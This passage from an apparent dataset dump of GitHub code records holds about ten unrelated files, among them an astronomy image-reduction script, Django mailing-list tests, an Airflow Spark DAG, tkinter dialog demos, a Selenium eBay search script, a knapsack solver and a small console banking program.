\"num\":\r\n name = \"snv_number\"\r\n else:\r\n name = \"snv_mean\"\r\n gene_list, a_group, b_group = fun(args.host_gene, two_group[0], two_group[1], args.cal_type, which)\r\n feature_gene = feature_select(gene_list, a_group, b_group, pval=args.pval, method=args.feature_selection_method,\\\r\n criterion=args.criterion, penalty=args.penalty, C=args.C, threshold=args.threshold)\r\n feature_genes.append(feature_gene)\r\n gene_lists[two_group[0]] = gene_list[a_group]; gene_lists[two_group[1]] = gene_list[b_group]\r\n os.chdir(target)\r\n save_parameters(args=args, which=which)\r\n group_dic = {two_group[0]: a_group, two_group[1]: b_group}\r\n color_length[two_group[0]] = a_group; color_length[two_group[1]] = b_group\r\n color, length = make_col_color_heatmap(group_dic)\r\n save_data_pdf(gene_list, \"host_gene_%s\" % name, length, color, group_dic, which)\r\n pd.DataFrame({\"gene\":feature_gene}).to_csv(\"feature_gene_pval%0.2f.txt\" % args.pval, sep=\"\\t\", index=False)\r\n feature_gene_cnv = gene_list.ix[feature_gene]\r\n evaluate_model(gene_list, a_group, b_group, feature_gene, name=\"feature_gene_%s\" % name, method=args.prediction_method, C=args.C, n_folds=args.n_folds)\r\n save_data_pdf(feature_gene_cnv, \"feature_gene_%s\" % name, length, color, group_dic, which)\r\n os.chdir(args.outdir)\r\n if len([args.group1, args.group2]) > 2:\r\n try:\r\n os.mkdir(\"intersection\")\r\n except FileExistsError:\r\n pass\r\n os.chdir(\"intersection\")\r\n color, length = make_col_color_heatmap(color_length)\r\n intersection_feature_gene = list(set(feature_genes[0]).intersection(*feature_genes[1:]))\r\n intersection_feature_gene_cnv = 
pd.concat([data.ix[intersection_feature_gene] for group, data in gene_lists.items()], axis=1)\r\n        try:\r\n            save_data_pdf(intersection_feature_gene_cnv, \"intersection\", length, color, color_length, which)\r\n        except Exception:\r\n            print(\"no intersection\\njob finish...\")\r\n    os.chdir(args.outdir)","repo_name":"861934367/genecast","sub_path":"build/lib/genecast_package/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":8150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"8125162022","text":"import datetime as dt\nfrom airflow import DAG, models\nfrom airflow.contrib.operators import dataproc_operator as dpo\nfrom airflow.utils import trigger_rule\n\nMAIN_JAR = 'file:///usr/lib/spark/examples/jars/spark-examples.jar'\nMAIN_CLASS = 'org.apache.spark.examples.SparkPi'\nCLUSTER_NAME = 'quickspark-cluster-{{ ds_nodash }}'\n\nyesterday = dt.datetime.combine(\n    dt.datetime.today() - dt.timedelta(1),\n    dt.datetime.min.time())\n\ndefault_dag_args = {\n    'start_date': yesterday,\n    'email_on_failure': False,\n    'email_on_retry': False,\n    'retries': 1,\n    'retry_delay': dt.timedelta(seconds=30),\n    'project_id': models.Variable.get('gcp_project')\n}\n\nwith DAG('dataproc_spark_submit', schedule_interval='0 17 * * *',\n         default_args=default_dag_args) as dag:\n\n    create_dataproc_cluster = dpo.DataprocClusterCreateOperator(\n        project_id = default_dag_args['project_id'],\n        task_id = 'create_dataproc_cluster',\n        cluster_name = CLUSTER_NAME,\n        num_workers = 2,\n        zone = models.Variable.get('gce_zone')\n    )\n\n    run_spark_job = dpo.DataProcSparkOperator(\n        task_id = 'run_spark_job',\n        #main_jar = MAIN_JAR,\n        main_class = MAIN_CLASS,\n        cluster_name = CLUSTER_NAME\n    )\n\n    delete_dataproc_cluster = dpo.DataprocClusterDeleteOperator(\n        project_id = default_dag_args['project_id'],\n        task_id = 'delete_dataproc_cluster',\n        cluster_name = CLUSTER_NAME,\n        trigger_rule = trigger_rule.TriggerRule.ALL_DONE\n    )\n\n    create_dataproc_cluster >> run_spark_job >> delete_dataproc_cluster","repo_name":"sanjeevkanabargi/python","sub_path":"airflow/code/sparkjob.py","file_name":"sparkjob.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"26451300813","text":"# -*- coding: utf-8 -*-\n\n\nclass Variant(dict):\n    \"\"\"Represent a Variant.\n\n    snv/indels and svs differ quite a lot, we are here representing them with the same object.\n    snv/indels will miss some of the information\n    \"\"\"\n\n    def __init__(\n        self,\n        chrom,\n        pos,\n        end,\n        ref,\n        alt,\n        variant_id=None,\n        end_chrom=None,\n        sv_type=None,\n        sv_len=None,\n        case_id=None,\n        observations=0,\n        homozygote=0,\n        hemizygote=0,\n        is_sv=False,\n        id_column=None,\n    ):\n        super(Variant, self).__init__(\n            _id=variant_id,\n            variant_id=variant_id,\n            chrom=chrom,\n            pos=pos,\n            end=end,\n            ref=ref,\n            alt=alt,\n            end_chrom=end_chrom,\n            sv_type=sv_type,\n            sv_len=sv_len,\n            case_id=case_id,\n            observations=observations,\n            homozygote=homozygote,\n            hemizygote=hemizygote,\n            is_sv=is_sv,\n            id_column=id_column,\n        )\n","repo_name":"Clinical-Genomics/loqusdb","sub_path":"loqusdb/models/variant.py","file_name":"variant.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"}
+{"seq_id":"41455655440","text":"\r\n'''\r\n#Message Box:\r\nfrom tkinter.ttk import Frame, Button\r\nfrom tkinter import Tk, BOTH\r\nimport tkinter.messagebox 
as mbox\r\n\r\nclass Example(Frame):\r\n def __init__(self, parent):\r\n Frame.__init__(self, parent)\r\n self.parent = parent\r\n self.initUI()\r\n\r\n def initUI(self):\r\n self.parent.title(\"Message Boxes\")\r\n self.pack()\r\n\r\n error = Button(self, text=\"Error\", command=self.onError)\r\n error.grid(padx=5, pady=5)\r\n warning = Button(self, text=\"Warning\", command=self.onWarn)\r\n warning.grid(row=1, column=0)\r\n question = Button(self, text=\"Question\", command=self.onQuest)\r\n question.grid(row=0, column=1)\r\n inform = Button(self, text=\"Information\", command=self.onInfo)\r\n inform.grid(row=1, column=1)\r\n\r\n def onError(self):\r\n mbox.showerror(\"Error\", \"Could not open file\")\r\n\r\n def onWarn(self):\r\n mbox.showwarning(\"Warning\", \"Deprecated function call\")\r\n\r\n def onQuest(self):\r\n mbox.askquestion(\"Question\", \"Are you sure to quit?\")\r\n\r\n def onInfo(self):\r\n mbox.showinfo(\"Information\", \"Download completed\")\r\n\r\nroot = Tk()\r\nex = Example(root)\r\nroot.geometry(\"300x150+300+300\")\r\nroot.mainloop()\r\n'''\r\n'''\r\n#Color chooser:\r\nfrom tkinter import Tk, Frame, Button, BOTH, SUNKEN\r\nfrom tkinter.colorchooser import askcolor\r\n\r\nclass Example(Frame):\r\n def __init__(self, parent):\r\n Frame.__init__(self, parent)\r\n \r\n self.parent = parent\r\n self.initUI()\r\n \r\n def initUI(self):\r\n self.parent.title(\"Color Chooser\")\r\n self.pack(fill=BOTH, expand =1 )\r\n \r\n self.btn = Button(self, text=\"Choose Color\", command=self.onChoose)\r\n self.btn.place(x=30, y=30)\r\n \r\n self.frame = Frame(self, border = 1, relief = SUNKEN, width = 100 , height = 100)\r\n self.frame.place(x=160, y=30)\r\n \r\n def onChoose(self):\r\n (rgb, hx) = askcolor()\r\n self.frame.config(bg = hx)\r\n \r\nroot = Tk()\r\nex = Example(root)\r\nroot.geometry(\"300x150+300+300\")\r\nroot.mainloop()\r\n'''\r\n#File Dialog:\r\n\r\nfrom tkinter import Frame, Tk, BOTH, Text, Menu, END\r\nfrom tkinter.filedialog import Open\r\n\r\nclass Example(Frame):\r\n def __init__(self, parent):\r\n Frame.__init__(self, parent)\r\n self.parent = parent\r\n self.initUI()\r\n\r\n def initUI(self):\r\n self.parent.title(\"File dialog\")\r\n self.pack(fill=BOTH, expand=1)\r\n\r\n menubar = Menu(self.parent)\r\n self.parent.config(menu=menubar)\r\n\r\n fileMenu = Menu(menubar)\r\n fileMenu.add_command(label=\"Open\", command=self.onOpen)\r\n menubar.add_cascade(label=\"File\", menu=fileMenu)\r\n\r\n self.txt = Text(self)\r\n self.txt.pack(fill=BOTH, expand=1)\r\n\r\n def onOpen(self):\r\n ftypes = [('Python files', '*.py'), ('All files', '*')]\r\n dlg = Open(self, filetypes = ftypes)\r\n fl = dlg.show()\r\n if fl != '':\r\n text = self.readFile(fl)\r\n self.txt.insert(END, text)\r\n \r\n def readFile(self, filename):\r\n f = open(filename, \"r\")\r\n text = f.read()\r\n return text\r\n\r\nroot = Tk()\r\nex = Example(root)\r\nroot.geometry(\"300x250+300+300\")\r\nroot.mainloop() ","repo_name":"KEROTAR0/python","sub_path":"python - lab4/1-5 MessageBox.py","file_name":"1-5 MessageBox.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1910433595","text":"import pylab as plt\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy import table\nfrom astropy import units\nimport glob\nfrom imaka.reduce import reduce_fli\nfrom imaka.reduce import calib\nimport pdb\nimport os\nfrom flystar import match\n\ndef make_sky():\n sky_dir = 
'/Users/jlu/data/imaka/2016_11_19/20161118/skies/binned/'\n sky_frames = [133, 145, 146, 163, 172, 179, 188]\n\n for ss in range(len(sky_frames)):\n sky_frames[ss] = '{0:s}sky_{1:03d}.fits'.format(sky_dir, sky_frames[ss])\n\n calib.makedark(sky_frames, 'pleiades_sky.fits')\n \ndef make_twilight_flats():\n twilights = ['twi_1001.fits', 'twi_2002.fits', 'twi_3003.fits',\n 'twi_4004.fits', 'twi_5005.fits', 'twi_6006.fits', 'twi_7007.fits',\n 'twi_8008.fits', 'twi_9009.fits', 'twi_10010.fits', 'twi_11011.fits',\n 'twi_12012.fits', 'twi_13013.fits', 'twi_14014.fits', 'twi_15015.fits',\n 'twi_16016.fits', 'twi_17017.fits', 'twi_18018.fits', 'twi_19019.fits',\n 'twi_20020.fits', 'twi_21021.fits', 'twi_22022.fits', 'twi_23023.fits',\n 'twi_24024.fits', 'twi_25025.fits', 'twi_26026.fits', 'twi_27027.fits',\n 'twi_28028.fits', 'twi_29029.fits', 'twi_30030.fits', 'twi_31031.fits']\n\n twi_darks = ['dark_1001002.fits', 'dark_2002013.fits', 'dark_3003024.fits',\n 'dark_4004035.fits', 'dark_5005044.fits', 'dark_6006045.fits', 'dark_7007046.fits',\n 'dark_8008047.fits', 'dark_9009048.fits', 'dark_10010001.fits', 'dark_11011003.fits',\n 'dark_12012004.fits', 'dark_13013005.fits', 'dark_14014006.fits', 'dark_15015007.fits',\n 'dark_16016008.fits', 'dark_17017009.fits', 'dark_18018010.fits', 'dark_19019011.fits',\n 'dark_20020012.fits', 'dark_21021014.fits', 'dark_22022015.fits', 'dark_23023016.fits',\n 'dark_24024017.fits', 'dark_25025018.fits', 'dark_26026019.fits', 'dark_27027020.fits',\n 'dark_28028021.fits', 'dark_29029022.fits', 'dark_30030023.fits', 'dark_31031025.fits']\n\n twilight_root = '/Users/jlu/data/imaka/2016_11_19/20161118/twilight/'\n twi_dark_root = '/Users/jlu/data/imaka/2016_11_19/20161118/darks/darks_for_twis/'\n\n for tt in range(len(twilights)):\n twilights[tt] = twilight_root + twilights[tt]\n twi_darks[tt] = twi_dark_root + twi_darks[tt]\n \n calib.makeflat(twilights, twi_darks, twilight_root + 'flat_r.fits')\n \n return\n\n \ndef reduce_pleiades_binned_open():\n sky_dir = '/Users/jlu/data/imaka/2016_11_19/20161118/skies/binned/'\n data_dir = '/Users/jlu/data/imaka/2016_11_19/20161118/Pleiades_E/open_loop/'\n os.chdir(data_dir)\n\n fnum = [137, 139, 142, 144, 148, 150, 152]\n img_files = ['obj_{0:03d}.fits'.format(ii) for ii in fnum]\n\n reduce_fli.clean_images(img_files, rebin=1, sky_frame=sky_dir + 'pleiades_sky.fits')\n\n return\n \n\ndef reduce_pleiades_binned_closed():\n sky_dir = '/Users/jlu/data/imaka/2016_11_19/20161118/skies/binned/'\n data_dir = '/Users/jlu/data/imaka/2016_11_19/20161118/Pleiades_E/closed_loop/'\n os.chdir(data_dir)\n\n fnum = [138, 141, 143, 147, 149, 151]\n img_files = ['obj_{0:03d}.fits'.format(ii) for ii in fnum]\n\n reduce_fli.clean_images(img_files, rebin=1, sky_frame=sky_dir + 'pleiades_sky.fits')\n\n return\n \ndef find_stars_pleiades_binned_open():\n data_dir = '/Users/jlu/data/imaka/2016_11_19/20161118/Pleiades_E/open_loop/'\n os.chdir(data_dir)\n \n fnum = [137, 139, 142, 144, 148, 150, 152]\n img_files = ['obj_{0:03d}_bin_nobkg.fits'.format(ii) for ii in fnum]\n\n reduce_fli.find_stars_bin(img_files, fwhm=2, threshold=6)\n\n return\n \ndef find_stars_pleiades_binned_closed():\n data_dir = '/Users/jlu/data/imaka/2016_11_19/20161118/Pleiades_E/closed_loop/'\n os.chdir(data_dir)\n \n fnum = [138, 141, 143, 147, 149, 151]\n img_files = ['obj_{0:03d}_bin_nobkg.fits'.format(ii) for ii in fnum]\n\n reduce_fli.find_stars_bin(img_files, fwhm=2, threshold=6)\n\n return\n\n\ndef compare_fwhm_list():\n data_dir = 
'/Users/jlu/data/imaka/2016_11_19/20161118/Pleiades_E/'\n os.chdir(data_dir)\n \n # o_list = np.arange(163, 173) # Open loop star lists\n # c_list = np.arange(153, 163) # Closed loop star lists\n # o_list = np.arange(163, 173) # Open loop star lists\n # c_list = np.arange(153, 163) # Closed loop star lists\n o_list = [137, 139, 142, 144, 148, 150]\n c_list = [138, 141, 143, 147, 149, 151]\n \n plt.ion()\n\n for ii in range(len(o_list)):\n open_list = 'open_loop/obj_{0:03d}_bin_nobkg_stars.txt'.format(o_list[ii])\n closed_list = 'closed_loop/obj_{0:03d}_bin_nobkg_stars.txt'.format(c_list[ii])\n\n compare_fwhm(open_list, closed_list, scale=3*0.04, flux_min=5)\n pdb.set_trace()\n\ndef compare_fwhm(open_list, closed_list, scale=0.04, flux_min=2.0):\n topen = table.Table.read(open_list, format='ascii')\n tclose = table.Table.read(closed_list, format='ascii')\n\n # Trim out any stars with FWHM > 10\n idx_o = np.where(topen['x_fwhm'] < 10)[0]\n idx_c = np.where(tclose['x_fwhm'] < 10)[0]\n\n topen = topen[idx_o]\n tclose = tclose[idx_c]\n\n # Trim out any stars with flux < flux_min\n idx_o = np.where(topen['flux'] > flux_min)[0]\n idx_c = np.where(tclose['flux'] > flux_min)[0]\n\n topen = topen[idx_o]\n tclose = tclose[idx_c]\n \n m_c = np.ones(len(tclose))\n m_o = np.ones(len(topen))\n\n idx_c, idx_o, dr, dm = match.match(tclose['xcentroid'], tclose['ycentroid'], m_c,\n topen['xcentroid'], topen['ycentroid'], m_o,\n dr_tol=10)\n # Matched catalogs\n to_match = topen[idx_o]\n tc_match = tclose[idx_c]\n\n # Plot\n plt.figure(1)\n plt.clf()\n plt.plot(to_match['x_fwhm']*scale, tc_match['x_fwhm']*scale, 'r.', label='X')\n plt.plot(to_match['y_fwhm']*scale, tc_match['y_fwhm']*scale, 'b.', label='Y')\n plt.plot([0, 10], [0, 10], 'k--')\n plt.xlabel('FWHM in Open Loop (\")')\n plt.ylabel('FWHM in Closed Loop (\")')\n plt.axis('equal')\n\n max_fwhm = 1.5*np.mean([to_match['x_fwhm'], to_match['y_fwhm'], tc_match['x_fwhm'], tc_match['y_fwhm']])\n plt.ylim(0, max_fwhm*scale)\n plt.xlim(0, max_fwhm*scale)\n plt.legend(numpoints=1, loc='upper left')\n plt.pause(0.05)\n\n plt.figure(2)\n plt.clf()\n x_ratio = tc_match['x_fwhm'] / to_match['x_fwhm']\n y_ratio = tc_match['y_fwhm'] / to_match['y_fwhm']\n \n plt.plot(to_match['x_fwhm']*scale, x_ratio, 'r.', label='X')\n plt.plot(to_match['y_fwhm']*scale, y_ratio, 'b.', label='Y')\n plt.axhline(1, linestyle='--', color='black')\n plt.xlabel('FWHM in Open Loop (\")')\n plt.ylabel('Closed / Open FWHM')\n\n max_fwhm = 1.5*np.mean([to_match['x_fwhm'], to_match['y_fwhm'], tc_match['x_fwhm'], tc_match['y_fwhm']])\n plt.xlim(0, max_fwhm*scale)\n plt.ylim(0, 1.5)\n plt.legend(numpoints=1, loc='upper left')\n plt.pause(0.05)\n\n x_fwhm_o_med = np.median(to_match['x_fwhm']) \n y_fwhm_o_med = np.median(to_match['y_fwhm']) \n x_fwhm_c_med = np.median(tc_match['x_fwhm']) \n y_fwhm_c_med = np.median(tc_match['y_fwhm'])\n \n print('Open Loop Stats:')\n print('\\t Median x_fwhm = {0:.1f} +/- {1:.1f}'.format(x_fwhm_o_med * scale,\n to_match['x_fwhm'].std() * scale))\n print('\\t Median y_fwhm = {0:.1f} +/- {1:.1f}'.format(y_fwhm_o_med * scale,\n to_match['y_fwhm'].std() * scale))\n\n print('Closed Loop Stats:')\n print('\\t Median x_fwhm = {0:.1f} +/- {1:.1f}'.format(x_fwhm_c_med * scale,\n tc_match['x_fwhm'].std() * scale))\n print('\\t Median y_fwhm = {0:.1f} +/- {1:.1f}'.format(y_fwhm_c_med * scale,\n tc_match['y_fwhm'].std() * scale))\n\n print('Fractional Improvement')\n print('\\t x_fwhm closed / open = {0:.2f}'.format(x_fwhm_c_med / x_fwhm_o_med))\n print('\\t y_fwhm closed 
/ open = {0:.2f}'.format(y_fwhm_c_med / y_fwhm_o_med))\n \n","repo_name":"jluastro/imaka","sub_path":"imaka/reduce/nights/reduce_2016_11_18.py","file_name":"reduce_2016_11_18.py","file_ext":"py","file_size_in_byte":8214,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"38675599559","text":"print(\"\"\"\n ----------------------------------\n | Bem-vindo, o que deseja fazer? |\n ----------------------------------\n \n 1 - Depósito\n\n 2 - Saque\n\n 3 - Extrato\n \"\"\")\n\nbalanco = 0\nextrato = \"\"\nnum_saque = 0\nLIMITE_SAQUE = 3\nlimite = 500\n\nwhile True:\n print('')\n escolha = int(input(\"Digite opção desejada: \\t\"))\n print('')\n if(escolha == 1):\n valor = float(input(\"Você escolheu depósito, qual valor gostaria de depositar? \\t \"))\n \n print(f'Valor depositado foi de: \\t R${valor:,.2f}')\n if (valor > 0):\n balanco += valor\n extrato += f'Depósito: \\t R${valor:,.2f}\\n'\n \n else:\n print('Não foi possível realizar essa operação')\n elif (escolha == 2):\n \n valor = float(input(\"Você escolheu retirada, qual valor gostaria de sacar? \\t \"))\n \n excedeu_saldo = valor > balanco\n excedeu_limite = valor > limite\n excedeu_saque = num_saque >= LIMITE_SAQUE\n\n if excedeu_saldo:\n print('Não há saldo suficiente, operação não realizada')\n elif excedeu_limite:\n print('Valor diário de saque foi atingido, operação não realizada')\n elif excedeu_saque:\n print('Limite de saques diários atingido, operação não realizada')\n elif valor > 0:\n print(f'Valor retirado foi de: \\t R${valor:,.2f}')\n balanco -= valor\n extrato += f'Retirada \\t R${valor:,.2f}\\n'\n num_saque += 1\n else:\n print('Valor informado inválido!')\n\n elif (escolha == 3):\n print('Extrato')\n print('Não há transição financeira' if not extrato else extrato)\n print(f'Balanço: R$ {balanco:,.2f}')\n\n else:\n print('Não foi possível realizar operação')\n","repo_name":"matteeussPei/Sistema-Bancario","sub_path":"sistemabancario.py","file_name":"sistemabancario.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21897106601","text":"from django import template\n\n\nregister = template.Library()\n\n\n@register.simple_tag(takes_context=True)\ndef get_site_root(context):\n return context['request'].site.root_page\n\n\n@register.inclusion_tag(\"home/inclusion/top_menu.html\", takes_context=True)\ndef top_menu(context, root, calling_page=None):\n menuitems = root.get_children().live().in_menu()\n for menuitem in menuitems:\n menuitem.has_children = menuitem.get_children().live().in_menu().exists()\n\n return {\n \"calling_page\": calling_page,\n \"menuitems\": menuitems,\n \"request\": context['request']\n }\n\n\n@register.inclusion_tag(\"home/inclusion/top_menu_children.html\", takes_context=True)\ndef top_menu_children(context, parent):\n children = parent.get_children()\n for child in children:\n child.has_children = child.get_children().live().in_menu().exists()\n\n return {\n 'parent': parent,\n 'children': children,\n 'request': context['request']\n }\n\n\n@register.inclusion_tag(\"home/inclusion/footer.html\", takes_context=True)\ndef display_footer(context):\n return {\n \"request\": context['request']\n }\n","repo_name":"wlminimal/epc","sub_path":"home/templatetags/epc_tags.py","file_name":"epc_tags.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"6800764671","text":"#��數字的個十百千位的數字\r\nfrom sys import stdout\r\nif __name__ == '__main__':\r\n x = int(input('pls input a four number:\\n'))\r\n xx = []\r\n a = x / 1000\r\n b = x % 1000 / 100\r\n c = x % 100 / 10\r\n d = x % 10\r\n xx.append(a)\r\n xx.append(b)\r\n xx.append(c)\r\n xx.append(d)\r\n print (xx)\r\n\r\nfrom sys import stdin\r\nfor s in range(100,1000):\r\n a=s/100\r\n b=(s%100)/10\r\n c=s%10\r\n print(a,b,c)\r\n break","repo_name":"Bill640616Chen/python","sub_path":"w3-Excersize013-7.py","file_name":"w3-Excersize013-7.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37628312683","text":"from mock import patch, MagicMock\nfrom allauth.account.models import EmailAddress\nfrom django.contrib.auth.models import User\nfrom django.utils.six.moves.urllib.error import HTTPError\nfrom django.test import override_settings\n\nfrom postorius.tests.utils import ViewTestCase\nfrom postorius.models import (\n MailmanApiError, MailmanListManager, MailmanUserManager)\n\n\nclass ModelTest(ViewTestCase):\n \"\"\"Tests for the list index page.\"\"\"\n\n def setUp(self):\n super(ModelTest, self).setUp()\n self.domain = self.mm_client.create_domain('example.com')\n self.foo_list = self.domain.create_list('foo')\n\n @override_settings(AUTOCREATE_MAILMAN_USER=False)\n def test_mailman_user_not_created_when_flag_is_off(self):\n user = User.objects.create_user(\n 'testuser', 'test@example.com', 'testpass')\n EmailAddress.objects.create(\n user=user, email=user.email, verified=True)\n with self.assertRaises(HTTPError):\n self.mm_client.get_user('test@example.com')\n\n @override_settings(AUTOCREATE_MAILMAN_USER=True)\n def test_mailman_user_created_when_flag_is_on(self):\n user = User.objects.create_user(\n 'testuser', 'test@example.com', 'testpass')\n EmailAddress.objects.create(\n user=user, email=user.email, verified=True)\n mm_user = self.mm_client.get_user('test@example.com')\n self.assertEqual(str(mm_user.addresses[0]), 'test@example.com')\n\n @override_settings(AUTOCREATE_MAILMAN_USER=True)\n @patch('postorius.models.MailmanUser')\n def test_core_not_reachable(self, mock_model):\n # Fail Gracefully if the Core is not reachable when\n # creating the user account.\n mock_model.objects.create_from_django.side_effect = MailmanApiError\n # User creation should succeed without any error, even though there\n # is no MailmanUser. 
However, this error should be logged.\n        with patch('postorius.models.logger') as log:\n            User.objects.create_user('testuser', 'test@example.com', 'testpass')\n            errmsg = 'Mailman Core API is not reachable.'\n            log.error.assert_called_with(errmsg)\n        # There should be no user in Mailman with this address.\n        with self.assertRaises(HTTPError):\n            self.mm_client.get_user('test@example.com')\n\n\nclass TestMailmanListManager(ViewTestCase):\n\n    def setUp(self):\n        super().setUp()\n        self.domain = self.mm_client.create_domain('example.com')\n        self.domain2 = self.mm_client.create_domain('most-desirable.org')\n        self.foo_list = self.domain.create_list('foo')\n        self.bar_list = self.domain.create_list('bar')\n        self.baz_list = self.domain2.create_list('baz')\n        self.list_manager = MailmanListManager()\n\n    def test_get_all_mailinglists(self):\n        lists = self.list_manager.all()\n        # This should return all 3 of the mailing lists that we have.\n        self.assertEqual(len(lists), 3)\n        self.assertEqual(\n            [x.fqdn_listname for x in lists],\n            ['bar@example.com', 'baz@most-desirable.org', 'foo@example.com'])\n\n    def test_get_by_mail_host(self):\n        lists = self.list_manager.by_mail_host('example.com')\n        self.assertEqual(len(lists), 2)\n        self.assertEqual(\n            [x.fqdn_listname for x in lists],\n            ['bar@example.com', 'foo@example.com'])\n\n    def test_get_single_mailinglist(self):\n        mlist = self.list_manager.get('baz@most-desirable.org')\n        self.assertIsNotNone(mlist)\n        self.assertEqual(str(mlist), str(self.baz_list))\n\n\nclass TestMailmanUserManager(ViewTestCase):\n\n    @override_settings(AUTOCREATE_MAILMAN_USER=False)\n    def setUp(self):\n        super().setUp()\n        self.user_manager = MailmanUserManager()\n        self.bob = User.objects.create(\n            email='bob@example.com', username='bob', first_name=\"Bob\")\n        self.alice = User.objects.create(\n            email='alice@example.com', username='alice', first_name='Alice')\n\n    def test_create_from_django_works(self):\n        mm_user = self.user_manager.create_from_django(self.bob)\n        self.assertIsNotNone(mm_user)\n        self.assertEqual(len(mm_user.addresses), 1)\n\n    def test_create_from_django_sets_all_attributes(self):\n        mm_user = self.user_manager.create_from_django(self.bob)\n        self.assertIsNotNone(mm_user)\n        self.assertEqual(mm_user.display_name, 'Bob')\n        self.assertEqual([str(x) for x in list(mm_user.addresses)],\n                         ['bob@example.com'])\n\n    def test_get_or_create_from_django(self):\n        self.user_manager.create_from_django = MagicMock(name='create')\n        muser = self.user_manager.get_or_create_from_django(self.bob)\n        self.assertIsNotNone(muser)\n        self.user_manager.create_from_django.assert_called_once()\n        # This was a non-existent user so it was created for us. 
Now, let's try\n        # with an existing user.\n        user = self.user_manager.create(email=self.bob.email, password=None)\n        self.assertIsNotNone(user)\n        # Now we reset the mock and see that create_from_django isn't called\n        # anymore.\n        self.user_manager.create_from_django.reset_mock()\n        muser = self.user_manager.get_or_create_from_django(self.bob)\n        self.user_manager.create_from_django.assert_not_called()\n","repo_name":"Nakaner/postorius-debian","sub_path":"src/postorius/tests/mailman_api_tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":5343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17935756210","text":"from selenium import webdriver\nimport re\nfrom ebay_entry import *\nfrom utils import *\nimport os\n\nif (os.name == 'nt'):\n    driver = webdriver.Chrome(os.path.join(os.getcwd(), 'chromedriver.exe'))\nelse:\n    driver = webdriver.Chrome()\n\ndriver.get(\"http://www.ebay.com\")\n\nsearch_item = \"Imax B6AC charger\"\n\n# get text-area\ntextarea = driver.find_element_by_id(\"gh-ac\")\n#clear and write search item\ntextarea.clear()\ntextarea.send_keys(search_item)\n#click search\nsearch_button = driver.find_element_by_id(\"gh-btn\")\nsearch_button.click()\n\nnum_results = driver.find_element_by_class_name(\"srp-controls__count-heading\")\n#results\nprint(num_results.text)\nnum_results = re.split(\" \", num_results.text)[0]\nif int(num_results) == 0:\n    print(\"result is zero, no data to analyze\")\n    quit()\n\n#we have a non-zero result..gather top 50 product data\npr_list = get_product_collection(driver)\n#driver.close()\n\n\n\n#gather item of top 50 relevant product and prep 50 ebay_entries\n#dump JSON of product data\n#analyze and represent data\n\n\n\n","repo_name":"SushanBasnet/wbscrp","sub_path":"ws.py","file_name":"ws.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23236992910","text":"from itertools import product\r\n\r\nclass KnapSack:\r\n    def __init__(self, profits, weights, capacity):\r\n        self.profits = profits\r\n        self.weights = weights\r\n        self.capacity = capacity\r\n\r\n    def solve_knapsack_brute_force(self):\r\n        dane = [0, 1]\r\n        max_profit = 0\r\n        productSet = product(dane, repeat = len(self.weights))\r\n\r\n        for element in productSet:\r\n            profit = 0\r\n            weight = 0\r\n            for index in range(len(element)):\r\n                sum = element[index] * self.weights[index]\r\n                weight += sum\r\n                res = element[index] * self.profits[index]\r\n                profit += res\r\n\r\n            if(weight <= self.capacity and profit >= max_profit):\r\n                max_profit = profit\r\n                indexes = [i for i in range(len(element)) if element[i] == 1]\r\n        return indexes\r\n    \r\n\r\n\r\n    def solve_knapsack_pw_ratio(self):\r\n        ratios = []\r\n        for p, w, i in zip(self.profits, \r\n                           self.weights, \r\n                           range(len(self.weights))\r\n                          ):\r\n            ratios.append( (p/w, i) )\r\n        ratios.sort(reverse = True)\r\n\r\n        sum = 0\r\n        i = 0\r\n        indexes = []\r\n\r\n        while(sum + self.weights[ratios[i][1]] <= self.capacity):\r\n            index = ratios[i][1]\r\n            sum += self.weights[index]\r\n            indexes.append(index)\r\n            i += 1\r\n        return indexes\r\n\r\n    def format(self, indexes):\r\n        indexes.sort()\r\n        print([el for el in indexes])\r\n","repo_name":"ewaMiazga/iai-2022","sub_path":"Knapsack Problem/KnapSack.py","file_name":"KnapSack.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"32639893227","text":"from base64 import b64encode\nfrom io import BytesIO\nfrom pathlib import Path\nfrom typing import Optional, Union\n\nfrom PIL import Image, ImageDraw, ImageFont\n\nfrom .config import FONT_FILE, templates\n\n\nclass Txt2Img:\n \"\"\"Convert text to image\"\"\"\n\n font_family: str\n title_font_size: int\n text_font_size: int\n title_line_space: int\n text_line_space: int\n text_max_width: int\n fix_width: bool\n text_color: tuple\n title_color: tuple\n bg_color: tuple\n\n def __init__(self):\n self.font_family = str(FONT_FILE)\n self.title_font_size = 45\n self.text_font_size = 30\n self.title_line_space = 30\n self.text_line_space = 15\n self.text_max_width = 1080\n self.fix_width = False\n self.text_color = (0, 0, 0, 255)\n self.title_color = (0, 0, 0, 255)\n self.bg_color = (255, 255, 255, 0)\n\n def set_font_family(self, font_family: str):\n \"\"\"设置字体\"\"\"\n self.font_family = font_family\n\n def set_font_size(self, font_size: int, title_font_size: Optional[int] = None):\n \"\"\"设置字体大小\"\"\"\n self.text_font_size = font_size\n self.text_line_space = font_size // 2\n if title_font_size is not None:\n self.title_font_size = title_font_size\n else:\n self.title_font_size = int(font_size 